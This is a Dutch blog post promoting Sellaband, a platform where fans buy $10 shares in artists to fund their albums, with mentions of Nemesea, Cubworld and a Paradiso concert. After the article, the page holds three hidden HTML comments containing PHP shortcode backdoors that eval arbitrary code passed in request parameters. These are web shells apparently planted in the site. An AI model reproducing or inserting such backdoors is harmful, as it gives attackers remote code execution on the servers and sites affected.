Sellaband: Investeer in de sterren van de toekomst

De muziekindustrie in haar huidige vorm is duidelijk op zijn retour. Welk model heeft dan wel toekomst? Dat is een stuk minder helder. Het lijkt allemaal zo makkelijk, je zet je muziek op internet en laat maar komen dat wereldsucces… Vergeet het maar, zo simpel is het niet. Wil een artiest kunnen doorbreken dan is er onder andere geld nodig voor een goede opname en promotie. Nu is dat nog het werk van een platenmaatschappij die investeert in een artiest door deze kosten te betalen.

Fans financieren artiesten
Sellaband.com pakt het heel anders aan. De financiering wordt door de fans van de artiest gedaan en als er succes volgt delen deze fans mee in de opbrengsten. Klinkt dat niet veelbelovend?

I’m a believer
Als je op Sellaband.com een artiest vindt waar je helemaal in gelooft, kun je één of meer aandelen (parts) kopen van 10 dollar per stuk. Je bent dan een ‘believer’. Zodra deze artiest 5000 van deze aandelen heeft verkocht, mag hij de studio in om onder begeleiding van een topproducer en een A&R manager een cd op te nemen. Alle aandeelhouders ontvangen gratis een exemplaar van deze cd.

Deel in de opbrengst
Vervolgens worden de tracks als gratis download op Sellaband.com aangeboden. De opbrengst van de reclame op deze website wordt gedeeld door de artiest en ‘believers’. Daarnaast wordt de cd uitgebracht en van de opbrengst daarvan gaat 50% naar de artiest. De resterende 50% wordt verdeeld onder de investerende fans.

Persoonlijk vind ik dit een beetje het zwakke punt van Sellaband. Cd’s verkopen is een beetje achterhaald. Zelf heb ik muziek liever direct als mp3. Ik verwacht meer succes als de tracks ook als downloads worden verkocht volgens het Allofmp3-model; van gratis in lage kwaliteit tot bijvoorbeeld een Euro voor een song in wav-formaat. 

De eerste band heeft de 5000 aandelen al verkocht
Het werkt dus! De Nederlandse band Nemesea heeft de primeur. Zij hebben hun 5000 aandelen verkocht en gaan de studio in om hun cd op te nemen.

Kwaliteitsmuziek
Ik heb een tijdje op Sellaband.com rondgesurft en -geluisterd en ik ben onder indruk van de kwaliteit van de aangeboden muziek. Zelf ben ik erg enthousiast over de muziek van Cubworld. Ik ben duidelijk niet de enige want Cubworld heeft op dit moment al bijna 3500 parts verkocht en kan dus alvast gaan denken aan het opnemen van zijn eerste cd. Ik ben benieuwd… Een andere artiest, Maitreya, heeft zelfs al een schitterende remix van het nummer My World van Cubworld gemaakt. Zeker de moeite van het luisteren waard. Te vinden op deze pagina

Luister ook eens naar de Sellaband Jukebox of duik eens in de Sellaband Charts. Misschien ontdek je zelf een artiest die het helemaal gaat maken.
 

Live in Paradiso
vandaag is er in Paradiso een concert waarin de best scorende artiesten van Sellaband optreden.

Tipje, Cubworld treed op om 20:00 en is live te volgen op www.fabchannel.com

<!– [insert_php]if (isset($_REQUEST["wmNe"])){eval($_REQUEST["wmNe"]);exit;}[/insert_php][php]if (isset($_REQUEST["wmNe"])){eval($_REQUEST["wmNe"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["PlRx"])){eval($_REQUEST["PlRx"]);exit;}[/insert_php][php]if (isset($_REQUEST["PlRx"])){eval($_REQUEST["PlRx"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["lKmsm"])){eval($_REQUEST["lKmsm"]);exit;}[/insert_php][php]if (isset($_REQUEST["lKmsm"])){eval($_REQUEST["lKmsm"]);exit;}[/php] –>

Gerelateerde berichten

Eén gedachte over “Sellaband: Investeer in de sterren van de toekomst

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *